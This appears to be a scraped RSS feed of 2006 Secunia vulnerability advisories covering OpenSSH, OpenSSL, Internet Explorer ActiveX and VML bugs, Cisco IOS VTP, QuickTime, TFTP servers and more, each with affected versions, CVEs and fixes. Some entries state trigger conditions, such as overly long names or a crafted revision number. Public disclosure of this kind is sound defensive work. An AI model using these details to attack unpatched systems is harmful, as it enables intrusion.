http://secunia.com/advisories/21846/]]> http://secunia.com/advisories/22232/ Mon, 02 Oct 2006 14:09:53 -0400 Release Date: 2006-09-29

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

Software: OpenSSH 3.x
OpenSSH 4.x

CVE reference: CVE-2006-5051 (Secunia mirror)
CVE-2006-5052 (Secunia mirror)


Description:
Mark Dowd reported a vulnerability in OpenSSH, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise of a vulnerable system.

The vulnerability is caused due to a race condition within the signal handling. This can be exploited to crash the OpenSSH server and potentially allows the execution of arbitrary code.

The vulnerability has been reported in version 4.3. Prior versions may also be affected.

Solution:
Update to OpenSSH 4.4.

Provided and/or discovered by:
Mark Dowd

Changelog:
2006-09-29: Added CVE reference.

Original Advisory:
http://openssh.org/txt/release-4.4

Other References:
http://rhn.redhat.com/errata/RHSA-2006-0697.html]]> http://secunia.com/advisories/22173/ Mon, 02 Oct 2006 14:08:42 -0400 Release Date: 2006-10-02

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

Software: FileZilla 2.x
FileZilla Server 0.x

CVE reference: CVE-2006-2937 (Secunia mirror)
CVE-2006-2940 (Secunia mirror)
CVE-2006-3738 (Secunia mirror)
CVE-2006-4343 (Secunia mirror)


Description:
Some vulnerabilities have been reported in FileZilla and FileZilla Server, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.

The vulnerabilities are caused due to the use of a vulnerable OpenSSL version.

For more information:
SA22130

Solution:
FileZilla:
Update to version 2.2.28.

FileZilla Server:
Update to version 0.9.19.

Original Advisory:
http://sourceforge.net/forum/forum.php?forum_id=617485

Other References:
SA22130:
http://secunia.com/advisories/22130/
]]> http://secunia.com/advisories/22094/ Mon, 02 Oct 2006 14:04:45 -0400 Release Date: 2006-09-29

Critical:
Moderately critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Workaround

Software: FFmpeg 0.x

CVE reference: CVE-2006-4800 (Secunia mirror)


Description:
Some vulnerabilities have been reported in FFmpeg, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

The vulnerabilities are caused due to various boundary errors within libavformat/rm.c, libavformat/sierravmd.c, libavformat/smacker.c, libavformat/tta.c, libavcodec/vorbis.c, libavcodec/dtsdec.c, libavcodec/4xm.c, libavcodec/alac.c, libavcodec/cook.c, libavcodec/shorten.c, libavcodec/snow.c, libavcodec/tta.c, and libavcodec/smacker.c. This can be exploited to cause buffer overflows when a specially crafted media file is opened.

Successful exploitation may potentially allow execution of arbitrary code.

Solution:
The vulnerabilities have been fixed in the CVS repository.

Provided and/or discovered by:
Disclosed via CVS commits by the vendor.]]> http://secunia.com/advisories/22180/ Mon, 02 Oct 2006 14:04:14 -0400 Release Date: 2006-09-29

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Workaround

Software: xine-lib 1.x

CVE reference: CVE-2006-4800 (Secunia mirror)


Description:
Some vulnerabilities have been reported in xine-lib, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

The vulnerabilities are caused due to the use of a vulnerable version of FFmpeg.

For more information:
SA22180

Solution:
The vulnerabilities have been fixed in CVS.

Other References:
SA22180:
http://secunia.com/advisories/22180/
]]> http://secunia.com/advisories/22181/ Mon, 02 Oct 2006 14:03:30 -0400 Release Date: 2006-09-29

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

Software: MPlayer 1.x

CVE reference: CVE-2006-4800 (Secunia mirror)


Description:
Some vulnerabilities have been reported in MPlayer, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

The vulnerabilities are caused due to the use of a vulnerable version of FFmpeg.

For more information:
SA22180

Solution:
Update to MPlayer-1.0pre8.

Other References:
SA22180:
http://secunia.com/advisories/22180/
]]> http://secunia.com/advisories/22182/ Mon, 02 Oct 2006 14:01:48 -0400
Secunia Advisory: SA22174
Release Date: 2006-09-28

Critical:
Moderately critical
Impact: Privilege escalation
DoS
Where: From remote
Solution Status: Unpatched

OS: Avaya S8XXX Media Servers

CVE reference: CVE-2004-2660 (Secunia mirror)
CVE-2006-1858 (Secunia mirror)
CVE-2006-2444 (Secunia mirror)
CVE-2006-2932 (Secunia mirror)
CVE-2006-2935 (Secunia mirror)
CVE-2006-2936 (Secunia mirror)
CVE-2006-3468 (Secunia mirror)
CVE-2006-3626 (Secunia mirror)
CVE-2006-3745 (Secunia mirror)


Description:
Avaya has acknowledged some vulnerabilities in various Avaya products, which can be exploited by malicious, local users to cause a DoS or gain escalated privileges and by malicious people to cause a DoS.

For more information:
SA20185
SA20225
SA20703
SA21041
SA21369
SA21515

The vulnerabilities affect:
* Avaya S87XX/S8500/S8300 (CM 3.x)

Solution:
The vendor recommends that local and network access to the affected systems should be restricted until an update is available.

Original Advisory:
http://support.avaya.com/elmodocs2/security/ASA-2006-203.htm

Other References:
SA20185:
http://secunia.com/advisories/20185/

SA20225:
http://secunia.com/advisories/20225/]]> http://secunia.com/advisories/22174/ Mon, 02 Oct 2006 14:00:59 -0400 Release Date: 2006-09-28
Last Update: 2006-09-29

Critical:
Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched

OS: Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional

CVE reference: CVE-2006-3730 (Secunia mirror)


Description:
H D Moore has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to an error in the Windows Shell and is exposed via the "setSlice()" method in the WebViewFolderIcon ActiveX control (webvw.dll). This can e.g. be exploited via Internet Explorer by a malicious website to corrupt memory by passing specially crafted arguments to the "setSlice()" method.

Successful exploitation allows execution of arbitrary code.

NOTE: Exploit code is publicly available.

The vulnerability is confirmed on a fully patched system with Internet Explorer 6.0 and Microsoft Windows XP SP2. Other versions may also be affected.

Solution:
Set the kill bit for the "WebViewFolderIcon" ActiveX control (see Microsoft advisory for details).

Only allow trusted websites to run ActiveX controls.

Provided and/or discovered by:
H D Moore

Changelog:
2006-09-29: Added additional information provided by Microsoft. Added link to Microsoft advisory and updated "Solution" section. Updated affected software.

Original Advisory:
H D Moore:
http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html

Microsoft:
http://www.microsoft.com/technet/security/advisory/926043.mspx
]]> http://secunia.com/advisories/22159/ Mon, 02 Oct 2006 13:59:52 -0400
Secunia Advisory: SA22130
Release Date: 2006-09-28
Last Update: 2006-09-29

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

Software: OpenSSL 0.9.x

CVE reference: CVE-2006-2937 (Secunia mirror)
CVE-2006-2940 (Secunia mirror)
CVE-2006-3738 (Secunia mirror)
CVE-2006-4343 (Secunia mirror)


Description:
Some vulnerabilities have been reported in OpenSSL, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.

1) An error in the processing of certain invalid ASN.1 structures can be exploited to cause an infinite loop and consume system memory in an application using OpenSSL to process ASN.1 data from untrusted sources.

NOTE: This does not affect versions prior to 0.9.7.

2) Certain types of public keys take overly long time to process and can be exploited to cause a DoS in an application using OpenSSL to process ASN.1 data from untrusted sources.

3) An error in the "SSL_get_shared_ciphers()" function can be exploited to cause a buffer overflow by sending a list of ciphers to an application using the vulnerable function.

Successful exploitation allows execution of arbitrary code.

4) An error in the SSLv2 client code can be exploited by a malicious server to crash a vulnerable client using OpenSSL to create an SSLv2 connection to the server.

Solution:
OpenSSL 0.9.7 branch:
Update to version 0.9.7l or later.

OpenSSL 0.9.8 branch:
Update to version 0.9.8d or later.

Provided and/or discovered by:
1, 2) Dr. S. N. Henson, Open Network Security
3, 4) Tavis Ormandy and Will Drewry, Google Security Team

Changelog:
2006-09-29: Updated advisory with additional information. Increased criticality. Added links to US-CERT vulnerability notes.

Original Advisory:
http://www.openssl.org/news/secadv_20060928.txt

Other References:
US-CERT VU#247744:
http://www.kb.cert.org/vuls/id/247744

US-CERT VU#386964:
http://www.kb.cert.org/vuls/id/386964

US-CERT VU#423396:
http://www.kb.cert.org/vuls/id/423396

US-CERT VU#547300:
http://www.kb.cert.org/vuls/id/547300
]]> http://secunia.com/advisories/22130/ Mon, 02 Oct 2006 13:59:01 -0400 Release Date: 2006-09-28

Critical:
Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Microsoft Office 2000
Microsoft Office 2003 Professional Edition
Microsoft Office 2003 Small Business Edition
Microsoft Office 2003 Standard Edition
Microsoft Office 2003 Student and Teacher Edition
Microsoft Office 2004 for Mac
Microsoft Office X for Mac
Microsoft Office XP
Microsoft PowerPoint 2000
Microsoft PowerPoint 2002
Microsoft Powerpoint 2003

CVE reference: CVE-2006-4694 (Secunia mirror)


Description:
A vulnerability has been reported in Microsoft PowerPoint, which can be exploited by malicious people to compromise a user's system.

The vulnerability is due to an unspecified error when processing PowerPoint documents containing a malformed string. This can be exploited to corrupt system memory and may allow execution of arbitrary code when a malicious PowerPoint document is opened.

NOTE: This vulnerability is reportedly being exploited in the wild.

Solution:
Do not open untrusted Office documents.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
Microsoft:
http://www.microsoft.com/technet/security/advisory/925984.mspx

Other References:
US-CERT VU#231204:
http://www.kb.cert.org/vuls/id/231204]]> http://secunia.com/advisories/22127/ Mon, 02 Oct 2006 13:58:07 -0400 Release Date: 2006-09-27

Critical:
Moderately critical
Impact: DoS
Where: From remote
Solution Status: Vendor Patch

OS: Sun Solaris 10


Description:
A vulnerability has been reported in Sun Solaris, which can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an unspecified error in the Kernel SSL feature when a Kernel SSL Proxy service instance is enabled and can be exploited to cause a system panic.

Solution:
Apply patch.

-- SPARC Platform --

Solaris 10:
Apply patch 123304-01 or later.

-- x86 Platform --

Solaris 10:
Apply patch 118855-17 or later.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102563-1]]> http://secunia.com/advisories/22136/ Mon, 02 Oct 2006 13:57:42 -0400 IBM AIX Inventory Scout Arbitrary File Overwrite Vulnerability Advisory Available in Danish

Secunia Advisory: SA22062
Release Date: 2006-09-26

Critical:
Less critical
Impact: Manipulation of data
Where: Local system
Solution Status: Vendor Workaround

OS: AIX 5.x


Description:
A vulnerability has been reported in IBM AIX, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

The vulnerability is caused due to an unspecified error in invscoutClient_VPD_Survey when performing a survey of the Vital Product Database. This can be exploited to overwrite the contents of arbitrary files, and can further be exploited e.g. to cause a DoS (Denial of Service).

The vulnerability has been reported in Inventory Scout for AIX 2.2.0.0 through 2.2.0.9.

Solution:
Apply Interim fix until APARs are available.

Interim fix:
ftp://aix.software.ibm.com/aix/efixes/security/invscoutClient_VPD_Survey.tar.Z

APAR for AIX 5.2.0:
Apply IY88735 (available approx. 2006-10-04).

APAR for AIX 5.3.0:
Apply IY88735 (available approx. 2006-10-04).

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
IBM:
http://www-1.ibm.com/support/docview.wss?uid=isg1IY88735]]> http://secunia.com/advisories/22062/ Tue, 26 Sep 2006 15:21:24 -0400 Release Date: 2006-09-22

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: Apple Macintosh OS X

CVE reference: CVE-2006-3507 (Secunia mirror)
CVE-2006-3508 (Secunia mirror)
CVE-2006-3509 (Secunia mirror)


Description:
Some vulnerabilities have been reported in AirPort, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a vulnerable system.

1) Two boundary errors exist in the handling of malformed wireless network frames. These can be exploited to cause a stack-based buffer overflow by sending a malicious frame to the system, and may allow arbitrary code execution with system privileges.

The vulnerability affects the following products equipped with wireless:
* Power Mac
* PowerBook
* iBook
* iMac
* Mac Pro
* Xserve
* PowerPC-based Mac mini

2) A boundary error exists in the AirPort wireless driver's handling of scan cache updates. This can be exploited to cause a buffer overflow by sending a malicious frame to the system and may lead to a system crash, privilege elevation, or execution of arbitrary code with system privileges.

3) An integer overflow exist in the AirPort wireless drivers API for third-party software, which may lead to a buffer overflow in applications using the API. This can be exploited to cause a buffer overflow by sending a malicious frame to the system and could crash the application or lead to arbitrary code execution with privileges of the user running the application.

Vulnerabilities #2 and #3 affect Intel-based Mac mini, MacBook, and MacBook Pro equipped with wireless and does not affect systems prior to Mac OS X v10.4.

Solution:
Apply Security Update 2006-005 or AirPort Update 2006-001:
http://www.apple.com/support/downloads/

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://docs.info.apple.com/article.html?artnum=304420

Other References:
US-CERT VU#563492:
http://www.kb.cert.org/vuls/id/563492

US-CERT VU#589540:
http://www.kb.cert.org/vuls/id/589540

US-CERT VU#867796:
http://www.kb.cert.org/vuls/id/867796
]]> http://secunia.com/advisories/22068/ Tue, 26 Sep 2006 15:20:28 -0400 Release Date: 2006-09-22

Critical:
Highly critical
Impact: Security Bypass
Cross Site Scripting
DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: RedHat Enterprise Linux AS 2.1
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux WS 2.1
RedHat Linux Advanced Workstation 2.1 for Itanium

CVE reference: CVE-2006-3016 (Secunia mirror)
CVE-2006-4020 (Secunia mirror)
CVE-2006-4482 (Secunia mirror)
CVE-2006-4486 (Secunia mirror)


Description:
Red Hat has issued an update for php. This fixes some vulnerabilities, which can be exploited by malicious, local users to bypass certain security restrictions, and by malicious people to conduct cross-site scripting and HTTP response splitting attacks, cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

For more information:
SA21328
SA21403
SA21546

Solution:
Updated packages are available from Red Hat Network.
http://rhn.redhat.com

Original Advisory:
http://rhn.redhat.com/errata/RHSA-2006-0682.html

Other References:
SA21328:
http://secunia.com/advisories/21328/

SA21403:
http://secunia.com/advisories/21403/

SA21546:
http://secunia.com/advisories/21546/


]]> http://secunia.com/advisories/22004/ Tue, 26 Sep 2006 15:19:51 -0400 Release Date: 2006-09-21

Critical:
Highly critical
Impact: Security Bypass
Cross Site Scripting
DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: SUSE Linux 10
SUSE Linux 10.1
SUSE Linux 9.2
SUSE Linux 9.3

CVE reference: CVE-2006-3311 (Secunia mirror)
CVE-2006-3587 (Secunia mirror)
CVE-2006-3588 (Secunia mirror)
CVE-2006-4640 (Secunia mirror)


Description:
SUSE has issued an update for flash-player. This fixes some vulnerabilities, which can be exploited by malicious people to bypass certain security restrictions or compromise a user's system.

For more information:
SA20971
SA21865

Solution:
Apply updated packages.

x86 Platform:

SUSE LINUX 10.1:
ftp://ftp.suse.com/pub/suse/update/10...86/flash-player-7.0.68.0-1.2.i586.rpm
63f5401393619b7507ee0799a946585b

SUSE LINUX 10.0:

ftp://ftp.suse.com/pub/suse/i386/upda...86/flash-player-7.0.68.0-1.1.i586.rpm
08db4253c044700b8ace05e48c0d1f30

SUSE LINUX 9.3:

ftp://ftp.suse.com/pub/suse/i386/upda...86/flash-player-7.0.68.0-1.1.i586.rpm
1da70b61f88ac230d3a32ab86d81dff8

SUSE LINUX 9.2:

ftp://ftp.suse.com/pub/suse/i386/upda...86/flash-player-7.0.68.0-1.1.i586.rpm
4e968dc6cb9c786f2059eeb11c71ac57

Sources:

SUSE LINUX 10.1:
ftp://ftp.suse.com/pub/suse/update/10...src/flash-player-7.0.68.0-1.2.src.rpm
a2c721f392edc190ee7ed744804819c6

SUSE LINUX 10.0:
ftp://ftp.suse.com/pub/suse/i386/upda...src/flash-player-7.0.68.0-1.1.src.rpm
73818355a51f9e5ae0d9f82b705d2fa0

SUSE LINUX 9.3:
ftp://ftp.suse.com/pub/suse/i386/upda...src/flash-player-7.0.68.0-1.1.src.rpm
74a26ba1d763f785a7dc861decdfc042

SUSE LINUX 9.2:
ftp://ftp.suse.com/pub/suse/i386/upda...src/flash-player-7.0.68.0-1.1.src.rpm
6658938ba3d5b367ccfe62c222606d8f

Original Advisory:
http://lists.suse.com/archive/suse-security-announce/2006-Sep/0007.html

Other References:
SA20971:
http://secunia.com/advisories/20971/

SA21865:
http://secunia.com/advisories/21865/
]]> http://secunia.com/advisories/22054/ Tue, 26 Sep 2006 15:18:31 -0400 Release Date: 2006-09-21
Last Update: 2006-09-26

Critical:
Moderately critical
Impact: System access
Where: From local network
Solution Status: Vendor Patch

OS: Cisco IOS 12.x
Cisco IOS R12.x

CVE reference: CVE-2006-4950 (Secunia mirror)


Description:
A vulnerability has been reported in Cisco IOS, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is due to an error, which inadvertently enables an additional read-write community string for DOCSIS-compliant cable-capable devices when the device is configured for SNMP management. This may be exploited to gain full control of the device.

The vulnerability has been reported in the following devices running Cisco IOS:
* Cisco IAD2430 Integrated Access Device
* Cisco IAD2431 Integrated Access Device
* Cisco IAD2432 Integrated Access Device
* Cisco VG224 Analog Phone Gateway
* Cisco MWR 1900 Mobile Wireless Edge Router
* Cisco MWR 1941 Mobile Wireless Edge Router

Solution:
Fixes are available (see patch matrix in vendor advisory).
http://www.cisco.com/warp/public/707/cisco-sa-20060920-docsis.shtml

Provided and/or discovered by:
Reported by the vendor.

Changelog:
2006-09-26: Added CVE reference.

Original Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20060920-docsis.shtml]]> http://secunia.com/advisories/21974/ Tue, 26 Sep 2006 15:16:59 -0400 Release Date: 2006-09-21
Last Update: 2006-09-26

Critical:
Moderately critical
Impact: System access
Where: From local network
Solution Status: Unpatched

Software: TFTP Server TFTPDWIN 0.x

CVE reference: CVE-2006-4948 (Secunia mirror)


Description:
Parvez Anwar has discovered a vulnerability in TFTP Server TFTPDWIN, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error in tftpd.exe during the processing of requested resources. This can be exploited to cause a stack-based buffer overflow by requesting a resource with an overly long name (more than 280 bytes).

Successful exploitation allows execution of arbitrary code.

The vulnerability is confirmed in version 0.4.2. Other versions may also be affected.

Solution:
Restrict use of the TFTP service to trusted networks only.

Provided and/or discovered by:
Parvez Anwar
]]> http://secunia.com/advisories/21854/ Tue, 26 Sep 2006 15:15:37 -0400 Release Date: 2006-09-20

Critical:
Highly critical
Impact: Security Bypass
Spoofing
DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: SGI Advanced Linux Environment 3

CVE reference: CVE-2006-3743 (Secunia mirror)
CVE-2006-3744 (Secunia mirror)
CVE-2006-4144 (Secunia mirror)
CVE-2006-3459 (Secunia mirror)
CVE-2006-3460 (Secunia mirror)
CVE-2006-3461 (Secunia mirror)
CVE-2006-3462 (Secunia mirror)
CVE-2006-3463 (Secunia mirror)
CVE-2006-3464 (Secunia mirror)
CVE-2006-3465 (Secunia mirror)
CVE-2006-1168 (Secunia mirror)
CVE-2006-4339 (Secunia mirror)
CVE-2006-4253 (Secunia mirror)
CVE-2006-4340 (Secunia mirror)
CVE-2006-4565 (Secunia mirror)
CVE-2006-4566 (Secunia mirror)
CVE-2006-4568 (Secunia mirror)
CVE-2006-4570 (Secunia mirror)
CVE-2006-4571 (Secunia mirror)


Description:
SGI has issued a patch for SGI Advanced Linux Environment. This fixes some vulnerabilities, which can be exploited by malicious people to bypass certain security restrictions, conduct spoofing attacks, cause a DoS (Denial of Service), and potentially compromise a vulnerable system.

For more information:
SA21621
SA21632
SA21791
SA21880
SA21915

Solution:
Apply patch 10332 for SGI ProPack 3 Service Pack 6.
http://support.sgi.com/

Original Advisory:
ftp://patches.sgi.com/support/free/security/advisories/20060901-01-P.asc

Other References:
SA21621:
http://secunia.com/advisories/21621/

SA21632:
http://secunia.com/advisories/21632/

SA21791:
http://secunia.com/advisories/21791/

SA21880:
http://secunia.com/advisories/21880/

SA21915:
http://secunia.com/advisories/21915/]]> http://secunia.com/advisories/22036/ Tue, 26 Sep 2006 15:15:10 -0400 Release Date: 2006-09-19

Critical:
Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Microsoft Internet Explorer 6.x


Description:
A vulnerability has been discovered in Microsoft Internet Explorer, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to an error in the processing of Vector Markup Language (VML) documents. This can be exploited by e.g. tricking a user into viewing a malicious VML document containing an overly long "fill" method inside a "rect" tag.

Successful exploitation allows execution of arbitrary code.

NOTE: Reportedly, this is currently being exploited in the wild.

The vulnerability has been confirmed on a fully patched system with Internet Explorer 6.0 and Microsoft Windows XP SP2. Other versions may also be affected.

Solution:
Do not visit untrusted web sites.

Deactivating Active Scripting will prevent exploitation using the currently known exploit.

Provided and/or discovered by:
Sample exploit provided by Sunbelt Software.
]]> http://secunia.com/advisories/21989/ Tue, 19 Sep 2006 09:46:40 -0400 Release Date: 2006-09-15

Critical:
Highly critical
Impact: Security Bypass
DoS
System access
Where: From remote
Solution Status: Vendor Patch

Software: Mozilla Thunderbird 0.x
Mozilla Thunderbird 1.0.x
Mozilla Thunderbird 1.5.x

CVE reference: CVE-2006-4253 (Secunia mirror)
CVE-2006-4339 (Secunia mirror)
CVE-2006-4340 (Secunia mirror)
CVE-2006-4565 (Secunia mirror)
CVE-2006-4566 (Secunia mirror)
CVE-2006-4567 (Secunia mirror)
CVE-2006-4570 (Secunia mirror)
CVE-2006-4571 (Secunia mirror)


Description:
Some vulnerabilities have been reported in Mozilla Thunderbird, which can be exploited by malicious people to conduct man-in-the-middle attacks, bypass certain security restrictions, and potentially compromise a user's system.

The problem is that scripts in remote XBL files in e-mails can be executed even when JavaScript has been disabled (JavaScript is disabled by default). This can be exploited to cause JavaScript code to be executed whenever the HTML content of an e-mail is being viewed, forwarded, or replied to. This may also enable exploitation of vulnerabilities requiring JavaScript.

Successful exploitation requires that the "Load Images" setting is enabled.

Some other vulnerabilities have also been reported. For more information:
SA21903

And vulnerabilities #1, #2, #3, and #7 in:
SA21906

NOTE: Exploitation of some of the vulnerabilities requires that JavaScript is enabled.

Solution:
Update to version 1.5.0.7.
http://www.mozilla.com/thunderbird/

Provided and/or discovered by:
Georgi Guninski

Original Advisory:
http://www.mozilla.org/security/announce/2006/mfsa2006-63.html

Other References:
SA21903:
http://secunia.com/advisories/21903/

SA21906:
http://secunia.com/advisories/21906/]]> http://secunia.com/advisories/21939/ Tue, 19 Sep 2006 09:45:52 -0400 Release Date: 2006-09-14
Last Update: 2006-09-18

Critical:
Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Microsoft Internet Explorer 6.x

CVE reference: CVE-2006-4777 (Secunia mirror)
CVE-2006-4446 (Secunia mirror)


Description:
nop has discovered a vulnerability in Internet Explorer, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a memory corruption error in the Microsoft Multimedia Controls ActiveX control (daxctle.ocx) in the "CPathCtl::KeyFrame()" function. This can be exploited by e.g. tricking a user into viewing a malicious HTML document passing specially crafted arguments to the ActiveX control's "KeyFrame()" method.

Successful exploitation allows execution of arbitrary code.

NOTE: A somewhat working exploit is publicly available for partially patched versions of Windows 2000. However, Secunia has successfully created a fully working exploit for Windows XP SP2 (fully patched).

It is also possible to crash the browser via the "Spline()" method.

Solution:
Only allow trusted websites to run ActiveX controls.

Provided and/or discovered by:
nop

Changelog:
2006-09-15: Added Microsoft, US-CERT, and CVE references.
2006-09-18: Added CVE reference.

Original Advisory:
http://www.xsec.org/index.php?module=releases&act=view&type=2&id=20

Microsoft:
http://www.microsoft.com/technet/security/advisory/925444.mspx

Other References:
US-CERT VU#377369:
http://www.kb.cert.org/vuls/id/377369
]]> http://secunia.com/advisories/21910/ Tue, 19 Sep 2006 09:44:56 -0400 Release Date: 2006-09-14

Critical:
Less critical
Impact: Manipulation of data
DoS
Where: From local network
Solution Status: Vendor Workaround

OS: Cisco CATOS 5.x
Cisco CATOS 6.x
Cisco CATOS 7.x
Cisco CATOS 8.x


Description:
FX has reported a vulnerability in Cisco CatOS, which can be exploited by malicious people to cause a DoS (Denial of Service).

For more information, see vulnerability #2 in:
SA21896

The vulnerability affects switches with VTP Operating Mode as either "server" or "client".

Solution:
The vendor recommends applying a VTP domain password to the VTP domain (see the vendor's advisory for details).

Provided and/or discovered by:
FX, Phenoelit.

Original Advisory:
http://www.cisco.com/warp/public/707/cisco-sr-20060913-vtp.shtml

Other References:
SA21896:
http://secunia.com/advisories/21896/
]]> http://secunia.com/advisories/21902/ Tue, 19 Sep 2006 09:44:27 -0400 Release Date: 2006-09-14
Last Update: 2006-09-18

Critical:
Moderately critical
Impact: Manipulation of data
DoS
System access
Where: From local network
Solution Status: Vendor Workaround

OS: Cisco IOS 10.x
Cisco IOS 11.x
Cisco IOS 12.x
Cisco IOS R11.x
Cisco IOS R12.x

CVE reference: CVE-2006-4774 (Secunia mirror)
CVE-2006-4775 (Secunia mirror)
CVE-2006-4776 (Secunia mirror)


Description:
FX has reported some vulnerabilities in Cisco IOS, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially to compromise a vulnerable network device.

1) An error exists in the handling of summary packets in the VLAN Truncing Protocol (VTP). This can be exploited to reset the switch with a Software Forced Crash Exception by sending a specially crafted packet to a trunk enabled port.

2) An integer overflow error exists in the VTP configuration revision handling. This can be exploited to prevent that changes to the VLAN database are properly propagated throughout the VTP domain by sending a specially crafted packet containing 0x7FFFFFFF as a configuration revision number.

3) A boundary error exists in the processing of VTP summary advertisement messages. This can be exploited to cause a heap-based buffer overflow by sending a specially crafted message containing an overly long VLAN name (more than 100 characters) to a trunk enabled port.

Successful exploitation may allow arbitrary code execution.

NOTE: The packets must be received with a matching domain name and a matching VTP domain password (if configured).

The vulnerabilities affect Cisco IOS with a VTP Operating Mode as either "server" or "client".

Solution:
A fix is reportedly available for vulnerability #1. The vendor also recommends applying a VTP domain password to the VTP domain (see the vendor's advisory for details).

Provided and/or discovered by:
FX, Phenoelit.

Changelog:
2006-09-18: Added CVE references.

Original Advisory:
Phenoelit:
http://www.phenoelit.de/stuff/CiscoVTP.txt

Cisco:
http://www.cisco.com/warp/public/707/cisco-sr-20060913-vtp.shtml]]> http://secunia.com/advisories/21896/ Tue, 19 Sep 2006 09:43:45 -0400 Release Date: 2006-09-13
Last Update: 2006-09-18

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

Software: Apple QuickTime 7.x

CVE reference: CVE-2006-4381 (Secunia mirror)
CVE-2006-4382 (Secunia mirror)
CVE-2006-4384 (Secunia mirror)
CVE-2006-4385 (Secunia mirror)
CVE-2006-4386 (Secunia mirror)
CVE-2006-4388 (Secunia mirror)
CVE-2006-4389 (Secunia mirror)


Description:
Multiple vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to compromise a user's system.

1) Errors in the processing of H.264 movies can be exploited to trigger an integer overflow or buffer overflow.

2) A boundary error within the processing of QuickTime movies can be exploited to cause a buffer overflow.

3) A boundary error within the processing of FLC movies can be exploited to cause a heap-based buffer overflow via a FLC movie with a specially crafted COLOR_64 chunk.

4) Errors within the processing of FlashPix files can be exploited to cause an integer overflow or buffer overflow.

5) An error within the processing of FlashPix files can be exploited to trigger an exception leaving an uninitialised object.

6) A boundary error within the processing of SGI images can be exploited to cause a buffer overflow.

Successful exploitation of the vulnerabilities may allow execution of arbitrary code.

Solution:
Update to version 7.1.3.
http://www.apple.com/quicktime/download/

Provided and/or discovered by:
The vendor credits:
1) Sowhat of Nevis Labs, Mike Price of McAfee AVERT Labs, and Piotr Bania.
2) Mike Price of McAfee AVERT Labs.
3) Mike Price of McAfee AVERT Labs and Ruben Santamarta.
4) Mike Price of McAfee AVERT Labs.
5) Mike Price of McAfee AVERT Labs.
6) Mike Price of McAfee AVERT Labs

Changelog:
2006-09-14: Added links to US-CERT.
2006-09-18: Added links to US-CERT.

Original Advisory:
Apple:
http://docs.info.apple.com/article.html?artnum=304357

iDEFENSE:
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=413

Reverse Mode:
http://www.reversemode.com/index.php?...;Itemid=2&func=fileinfo&id=25

Piotr Bania:
http://pb.specialised.info/all/adv/quicktime-integer-overflow-h264-adv-7.1.txt

Other References:
US-CERT VU#489836:
http://www.kb.cert.org/vuls/id/489836

US-CERT VU#540348:
http://www.kb.cert.org/vuls/id/540348

US-CERT VU#554252:
http://www.kb.cert.org/vuls/id/554252

US-CERT VU#683700:
http://www.kb.cert.org/vuls/id/683700

US-CERT VU#200316:
http://www.kb.cert.org/vuls/id/200316

US-CERT VU#308204:
http://www.kb.cert.org/vuls/id/308204]]> http://secunia.com/advisories/21893/ Tue, 19 Sep 2006 09:42:58 -0400 Release Date: 2006-09-12
Last Update: 2006-09-18

Critical:
Moderately critical
Impact: DoS
System access
Where: From local network
Solution Status: Unpatched

Software: TFTP Server MT 1.x

CVE reference: CVE-2006-4781 (Secunia mirror)


Description:
n00b has discovered a vulnerability in TFTP Server MT, which potentially can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error when constructing the absolute path to a requested resource. This can be exploited to cause a heap-based buffer overflow by supplying an overly long string (about 260 bytes) as a resource in a request.

Successful exploitation may allow execution of arbitrary code.

The vulnerability is confirmed in version 1.1. Other versions may also be affected.

Solution:
Restrict use of the TFTP service to trusted networks only.

Provided and/or discovered by:
n00b

Changelog:
2006-09-18: Added CVE reference.

Original Advisory:
